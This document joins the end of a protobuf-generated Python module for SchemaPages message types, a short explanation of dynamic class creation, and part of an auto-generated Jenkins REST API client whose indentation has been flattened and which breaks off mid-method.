      name='rangeIncludes', full_name='SchemaPages.SDOProperty.rangeIncludes', index=3,
      number=4, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='inverse', full_name='SchemaPages.SDOProperty.inverse', index=4,
      number=5, type=9, cpp_type=9, label=2,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='subs', full_name='SchemaPages.SDOProperty.subs', index=5,
      number=6, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='supers', full_name='SchemaPages.SDOProperty.supers', index=6,
      number=7, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='termStack', full_name='SchemaPages.SDOProperty.termStack', index=7,
      number=8, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=568,
  serialized_end=752,
)

_SDOENUMERATIONVALUE = _descriptor.Descriptor(
  name='SDOEnumerationValue',
  full_name='SchemaPages.SDOEnumerationValue',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='id', full_name='SchemaPages.SDOEnumerationValue.id', index=0,
      number=1, type=9, cpp_type=9, label=2,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='termdescriptor', full_name='SchemaPages.SDOEnumerationValue.termdescriptor', index=1,
      number=2, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='enumerationParent', full_name='SchemaPages.SDOEnumerationValue.enumerationParent', index=2,
      number=3, type=9, cpp_type=9, label=2,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=754,
  serialized_end=860,
)

_SDOREFERENCE = _descriptor.Descriptor(
  name='SDOReference',
  full_name='SchemaPages.SDOReference',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='id', full_name='SchemaPages.SDOReference.id', index=0,
      number=1, type=9, cpp_type=9, label=2,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='uri', full_name='SchemaPages.SDOReference.uri', index=1,
      number=2, type=9, cpp_type=9, label=2,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=862,
  serialized_end=901,
)

_SDOBASETYPEEXPANDED = _descriptor.Descriptor(
  name='SDOBaseTypeExpanded',
  full_name='SchemaPages.SDOBaseTypeExpanded',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='id', full_name='SchemaPages.SDOBaseTypeExpanded.id', index=0,
      number=1, type=9, cpp_type=9, label=2,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='termdescriptor', full_name='SchemaPages.SDOBaseTypeExpanded.termdescriptor', index=1,
      number=2, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='properties', full_name='SchemaPages.SDOBaseTypeExpanded.properties', index=2,
      number=3, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='expectedTypeFor', full_name='SchemaPages.SDOBaseTypeExpanded.expectedTypeFor', index=3,
      number=4, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='enumerationMembers', full_name='SchemaPages.SDOBaseTypeExpanded.enumerationMembers', index=4,
      number=5, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='subs', full_name='SchemaPages.SDOBaseTypeExpanded.subs', index=5,
      number=6, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='supers', full_name='SchemaPages.SDOBaseTypeExpanded.supers', index=6,
      number=7, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='termStack', full_name='SchemaPages.SDOBaseTypeExpanded.termStack', index=7,
      number=8, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=904,
  serialized_end=1200,
)

_SDOBASETYPEEXPANDEDPROPSONLY = _descriptor.Descriptor(
  name='SDOBaseTypeExpandedPropsOnly',
  full_name='SchemaPages.SDOBaseTypeExpandedPropsOnly',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='id', full_name='SchemaPages.SDOBaseTypeExpandedPropsOnly.id', index=0,
      number=1, type=9, cpp_type=9, label=2,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='termdescriptor', full_name='SchemaPages.SDOBaseTypeExpandedPropsOnly.termdescriptor', index=1,
      number=2, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='properties', full_name='SchemaPages.SDOBaseTypeExpandedPropsOnly.properties', index=2,
      number=3, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='expectedTypeFor', full_name='SchemaPages.SDOBaseTypeExpandedPropsOnly.expectedTypeFor', index=3,
      number=4, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='enumerationMembers', full_name='SchemaPages.SDOBaseTypeExpandedPropsOnly.enumerationMembers', index=4,
      number=5, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='subs', full_name='SchemaPages.SDOBaseTypeExpandedPropsOnly.subs', index=5,
      number=6, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='supers', full_name='SchemaPages.SDOBaseTypeExpandedPropsOnly.supers', index=6,
      number=7, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='termStack', full_name='SchemaPages.SDOBaseTypeExpandedPropsOnly.termStack', index=7,
      number=8, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=1203,
serialized_end=1465,
)
_SDOTERM.fields_by_name['termType'].enum_type = _TERMTYPE
_SDOTERM.fields_by_name['superPaths'].message_type = _SUPERPATH
_SDOBASETYPE.fields_by_name['termdescriptor'].message_type = _SDOTERM
_SDOPROPERTY.fields_by_name['termdescriptor'].message_type = _SDOTERM
_SDOENUMERATIONVALUE.fields_by_name['termdescriptor'].message_type = _SDOTERM
_SDOBASETYPEEXPANDED.fields_by_name['termdescriptor'].message_type = _SDOTERM
_SDOBASETYPEEXPANDED.fields_by_name['properties'].message_type = _SDOPROPERTY
_SDOBASETYPEEXPANDED.fields_by_name['expectedTypeFor'].message_type = _SDOPROPERTY
_SDOBASETYPEEXPANDED.fields_by_name['termStack'].message_type = _SDOBASETYPEEXPANDEDPROPSONLY
_SDOBASETYPEEXPANDEDPROPSONLY.fields_by_name['termdescriptor'].message_type = _SDOTERM
_SDOBASETYPEEXPANDEDPROPSONLY.fields_by_name['properties'].message_type = _SDOPROPERTY
_SDOBASETYPEEXPANDEDPROPSONLY.fields_by_name['expectedTypeFor'].message_type = _SDOPROPERTY
DESCRIPTOR.message_types_by_name['SuperPath'] = _SUPERPATH
DESCRIPTOR.message_types_by_name['SDOTerm'] = _SDOTERM
DESCRIPTOR.message_types_by_name['SDOBaseType'] = _SDOBASETYPE
DESCRIPTOR.message_types_by_name['SDOProperty'] = _SDOPROPERTY
DESCRIPTOR.message_types_by_name['SDOEnumerationValue'] = _SDOENUMERATIONVALUE
DESCRIPTOR.message_types_by_name['SDOReference'] = _SDOREFERENCE
DESCRIPTOR.message_types_by_name['SDOBaseTypeExpanded'] = _SDOBASETYPEEXPANDED
DESCRIPTOR.message_types_by_name['SDOBaseTypeExpandedPropsOnly'] = _SDOBASETYPEEXPANDEDPROPSONLY
DESCRIPTOR.enum_types_by_name['TermType'] = _TERMTYPE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
SuperPath = _reflection.GeneratedProtocolMessageType('SuperPath', (_message.Message,), {
'DESCRIPTOR' : _SUPERPATH,
'__module__' : 'schemapages_pb2'
# @@protoc_insertion_point(class_scope:SchemaPages.SuperPath)
})
_sym_db.RegisterMessage(SuperPath)
SDOTerm = _reflection.GeneratedProtocolMessageType('SDOTerm', (_message.Message,), {
'DESCRIPTOR' : _SDOTERM,
'__module__' : 'schemapages_pb2'
# @@protoc_insertion_point(class_scope:SchemaPages.SDOTerm)
})
_sym_db.RegisterMessage(SDOTerm)
SDOBaseType = _reflection.GeneratedProtocolMessageType('SDOBaseType', (_message.Message,), {
'DESCRIPTOR' : _SDOBASETYPE,
'__module__' : 'schemapages_pb2'
# @@protoc_insertion_point(class_scope:SchemaPages.SDOBaseType)
})
_sym_db.RegisterMessage(SDOBaseType)
SDOProperty = _reflection.GeneratedProtocolMessageType('SDOProperty', (_message.Message,), {
'DESCRIPTOR' : _SDOPROPERTY,
'__module__' : 'schemapages_pb2'
# @@protoc_insertion_point(class_scope:SchemaPages.SDOProperty)
})
_sym_db.RegisterMessage(SDOProperty)
SDOEnumerationValue = _reflection.GeneratedProtocolMessageType('SDOEnumerationValue', (_message.Message,), {
'DESCRIPTOR' : _SDOENUMERATIONVALUE,
'__module__' : 'schemapages_pb2'
# @@protoc_insertion_point(class_scope:SchemaPages.SDOEnumerationValue)
})
_sym_db.RegisterMessage(SDOEnumerationValue)
SDOReference = _reflection.GeneratedProtocolMessageType('SDOReference', (_message.Message,), {
'DESCRIPTOR' : _SDOREFERENCE,
'__module__' : 'schemapages_pb2'
# @@protoc_insertion_point(class_scope:SchemaPages.SDOReference)
})
_sym_db.RegisterMessage(SDOReference)
SDOBaseTypeExpanded = _reflection.GeneratedProtocolMessageType('SDOBaseTypeExpanded', (_message.Message,), {
'DESCRIPTOR' : _SDOBASETYPEEXPANDED,
'__module__' : 'schemapages_pb2'
# @@protoc_insertion_point(class_scope:SchemaPages.SDOBaseTypeExpanded)
})
_sym_db.RegisterMessage(SDOBaseTypeExpanded)
SDOBaseTypeExpandedPropsOnly = _reflection.GeneratedProtocolMessageType('SDOBaseTypeExpandedPropsOnly', (_message.Message,), {
'DESCRIPTOR' : _SDOBASETYPEEXPANDEDPROPSONLY,
'__module__' : 'schemapages_pb2'
# @@protoc_insertion_point(class_scope:SchemaPages.SDOBaseTypeExpandedPropsOnly)
})
_sym_db.RegisterMessage(SDOBaseTypeExpandedPropsOnly)
# @@protoc_insertion_point(module_scope)
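The registration block above builds each message class at runtime with `_reflection.GeneratedProtocolMessageType`, a metaclass that takes a class name, a base tuple, and a namespace dict. Conceptually this is Python's three-argument `type()` call; the sketch below illustrates that mechanism with a stand-in base class and a placeholder descriptor (no protobuf dependency — all names here are illustrative, and the real metaclass additionally wires field accessors from the `DESCRIPTOR`):

```python
# Conceptual stand-in for google.protobuf.message.Message (illustrative only).
class Message:
    pass

# type(name, bases, namespace) creates a class dynamically, just as
# GeneratedProtocolMessageType('SuperPath', (_message.Message,), {...}) does above.
# 'DESCRIPTOR' here is a placeholder for the real _SUPERPATH descriptor object.
SuperPath = type('SuperPath', (Message,), {
    'DESCRIPTOR': object(),
    '__module__': 'schemapages_pb2',
})

sp = SuperPath()
```

After this call, `SuperPath` behaves like any statically defined class: it has the given `__name__` and `__module__`, and its instances are `Message` subclass instances, which is why `_sym_db.RegisterMessage(SuperPath)` can treat it uniformly with hand-written message types.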
# coding: utf-8
"""
Swaggy Jenkins
Jenkins API clients generated from Swagger / Open API specification # noqa: E501
OpenAPI spec version: 1.1.1
Contact: blah@cliffano.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from swaggyjenkins.api_client import ApiClient
class RemoteAccessApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_computer(self, depth, **kwargs): # noqa: E501
"""get_computer # noqa: E501
Retrieve computer details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_computer(depth, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int depth: Recursion depth in response model (required)
:return: ComputerSet
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_computer_with_http_info(depth, **kwargs) # noqa: E501
else:
(data) = self.get_computer_with_http_info(depth, **kwargs) # noqa: E501
return data
def get_computer_with_http_info(self, depth, **kwargs): # noqa: E501
"""get_computer # noqa: E501
Retrieve computer details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_computer_with_http_info(depth, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int depth: Recursion depth in response model (required)
:return: ComputerSet
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['depth'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_computer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'depth' is set
if ('depth' not in local_var_params or
local_var_params['depth'] is None):
raise ValueError("Missing the required parameter `depth` when calling `get_computer`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'depth' in local_var_params:
query_params.append(('depth', local_var_params['depth'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['jenkins_auth'] # noqa: E501
return self.api_client.call_api(
'/computer/api/json', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ComputerSet', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_jenkins(self, **kwargs): # noqa: E501
"""get_jenkins # noqa: E501
Retrieve Jenkins details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_jenkins(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: Hudson
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_jenkins_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_jenkins_with_http_info(**kwargs) # noqa: E501
return data
def get_jenkins_with_http_info(self, **kwargs): # noqa: E501
"""get_jenkins # noqa: E501
Retrieve Jenkins details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_jenkins_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: Hudson
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_jenkins" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['jenkins_auth'] # noqa: E501
return self.api_client.call_api(
'/api/json', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Hudson', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_job(self, name, **kwargs): # noqa: E501
"""get_job # noqa: E501
Retrieve job details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_job(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the job (required)
:return: FreeStyleProject
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_job_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.get_job_with_http_info(name, **kwargs) # noqa: E501
return data
def get_job_with_http_info(self, name, **kwargs): # noqa: E501
"""get_job # noqa: E501
Retrieve job details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_job_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the job (required)
:return: FreeStyleProject
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_job" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in local_var_params or
local_var_params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_job`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['jenkins_auth'] # noqa: E501
return self.api_client.call_api(
'/job/{name}/api/json', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FreeStyleProject', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_job_config(self, name, **kwargs): # noqa: E501
"""get_job_config # noqa: E501
Retrieve job configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_job_config(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the job (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_job_config_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.get_job_config_with_http_info(name, **kwargs) # noqa: E501
return data
def get_job_config_with_http_info(self, name, **kwargs): # noqa: E501
"""get_job_config # noqa: E501
Retrieve job configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_job_config_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the job (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_job_config" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in local_var_params or
local_var_params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_job_config`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/xml']) # noqa: E501
# Authentication setting
auth_settings = ['jenkins_auth'] # noqa: E501
return self.api_client.call_api(
'/job/{name}/config.xml', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_job_last_build(self, name, **kwargs): # noqa: E501
"""get_job_last_build # noqa: E501
Retrieve job's last build details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_job_last_build(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the job (required)
:return: FreeStyleBuild
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_job_last_build_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.get_job_last_build_with_http_info(name, **kwargs) # noqa: E501
return data
def get_job_last_build_with_http_info(self, name, **kwargs): # noqa: E501
"""get_job_last_build # noqa: E501
Retrieve job's last build details # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_job_last_build_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the job (required)
:return: FreeStyleBuild
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_job_last_build" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in local_var_params or
local_var_params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_job_last_build`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['jenkins_auth'] # noqa: E501
return self.api_client.call_api(
'/job/{name}/lastBuild/api/json', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FreeStyleBuild', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_job_progressive_text(self, name, number, start, **kwargs): # noqa: E501
"""get_job_progressive_text # noqa: E501
Retrieve job's build progressive text output # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_job_progressive_text(name, number, start, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the job (required)
:param str number: Build number (required)
:param str start: Starting point of progressive text output (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_job_progressive_text_with_http_info(name, number, start, **kwargs) # noqa: E501
else:
(data) = self.get_job_progressive_text_with_http_info(name, number, start, **kwargs) # noqa: E501
return data
def get_job_progressive_text_with_http_info(self, name, number, start, **kwargs): # noqa: E501
"""get_job_progressive_text # noqa: E501
Retrieve job's build progressive text output # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_job_progressive_text_with_http_info(name, number, start, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: Name of the job (required)
:param str number: Build number (required)
:param str start: Starting point of progressive text output (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['name', 'number', 'start'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_job_progressive_text" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in local_var_params or
local_var_params['name'] is None):
